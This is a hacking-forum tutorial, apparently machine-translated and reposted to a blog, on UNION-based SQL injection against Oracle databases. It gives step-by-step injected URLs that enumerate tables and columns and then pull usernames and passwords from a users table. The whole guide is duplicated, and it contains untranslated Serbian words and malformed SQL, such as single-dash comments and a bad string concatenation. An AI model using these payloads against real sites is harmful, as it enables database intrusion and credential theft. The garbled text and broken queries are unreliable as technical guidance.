Oracle injection
[Oracle Injection Full
Guide] [/ b]
By Matrix@evilzone.org
(do not fucking touch
copyright)
[table of content]
How to check if the site
was vulnerable to
Oracle injection
[1] Find out how many
columns
[2] from the database
Extraktovanje
[3] The drawing table
[4] The drawing data
from tables
[5] The drawing data
from columns
How to check if the site
was vulnerable to
Oracle injection
Adding "UNION SELECT
NULL from dual
-" (without the quotes)
example:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL from dual
- ]
If it comes to Oracle
should get errors like
this:
[Oracle] [ODBC] [Ora]
ORA-01789: query block has
incorrect number of
resultcolumns
-------------------------------------------------------------------------------
[1] Find out how many
columns
Adding a NULL until you get
the error you find out the
number of columns.
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, NULL, NULL
from dual -
-------------------------------------------------------------------------------
[2] from the database
Extraktovanje
Now that we know the
number of columns it is time
to draw what we can from the
DB.
Now we need to know which
column is usable and to use
"string". In order to do this
you need to "NULL" replace
with 'a'. If you get an error
'and' replace with "NULL" and
move on to the next "NULL"
and so on until you get the
error continue. An example
of this:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, 'a', 'a' from
dual -
-------------------------------------------------------------------------------
[3] Izlacenje table
When you find a column that
can be used you can start
looking for table names. To
perform this we use the
"user_objects". We also
used the "object_name" and
"object_type" to show the
table name and its type.
http://www.primer.rs/
index.php?id=1]http://
www.primer.rs/index.php?
id=1]http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, object_name,
object_type from
user_objects--
(You can only use NULL's
where mistakes were shown,
that one 'a', 'a' in the link
replace the object_name,
object_type. Alternatively
you can use instead
all_user_objects user_object)
-------------------------------------------------------------------------------
[4] The drawing data from
tables
You should now see all the
tables in the database. If
you do not see them try to
delete all NULL's and find the
columns that use some type
of string.
We have found table users
will now try to extract data
from it as follows:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, column_name,
null from user_tab_columns
where table_name = Users--
--------------------------------------------------
-----------------------------
[5] The drawing data from
columns
Now it was time to pull the
data from columns that
usernames and passwords
as follows:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, login,
password from users --
You will receive a username
and password data!
If there is only one column
that uses the string type to
try to extract data as
follows:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, login||:||
password, NULL from
user_objects -CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
Guide] [/ b]
By Matrix@evilzone.org
(do not fucking touch
copyright)
[table of content]
How to check if the site
was vulnerable to
Oracle injection
[1] Find out how many
columns
[2] from the database
Extraktovanje
[3] The drawing table
[4] The drawing data
from tables
[5] The drawing data
from columns
How to check if the site
was vulnerable to
Oracle injection
Adding "UNION SELECT
NULL from dual
-" (without the quotes)
example:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL from dual
- ]
If it comes to Oracle
should get errors like
this:
[Oracle] [ODBC] [Ora]
ORA-01789: query block has
incorrect number of
resultcolumns
-------------------------------------------------------------------------------
[1] Find out how many
columns
Adding a NULL until you get
the error you find out the
number of columns.
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, NULL, NULL
from dual -
-------------------------------------------------------------------------------
[2] from the database
Extraktovanje
Now that we know the
number of columns it is time
to draw what we can from the
DB.
Now we need to know which
column is usable and to use
"string". In order to do this
you need to "NULL" replace
with 'a'. If you get an error
'and' replace with "NULL" and
move on to the next "NULL"
and so on until you get the
error continue. An example
of this:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, 'a', 'a' from
dual -
-------------------------------------------------------------------------------
[3] Izlacenje table
When you find a column that
can be used you can start
looking for table names. To
perform this we use the
"user_objects". We also
used the "object_name" and
"object_type" to show the
table name and its type.
http://www.primer.rs/
index.php?id=1]http://
www.primer.rs/index.php?
id=1]http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, object_name,
object_type from
user_objects--
(You can only use NULL's
where mistakes were shown,
that one 'a', 'a' in the link
replace the object_name,
object_type. Alternatively
you can use instead
all_user_objects user_object)
-------------------------------------------------------------------------------
[4] The drawing data from
tables
You should now see all the
tables in the database. If
you do not see them try to
delete all NULL's and find the
columns that use some type
of string.
We have found table users
will now try to extract data
from it as follows:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, column_name,
null from user_tab_columns
where table_name = Users--
--------------------------------------------------
-----------------------------
[5] The drawing data from
columns
Now it was time to pull the
data from columns that
usernames and passwords
as follows:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, login,
password from users --
You will receive a username
and password data!
If there is only one column
that uses the string type to
try to extract data as
follows:
http://www.primer.rs/
index.php?id=1 UNION
SELECT NULL, login||:||
password, NULL from
user_objects -CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
Comments
Post a Comment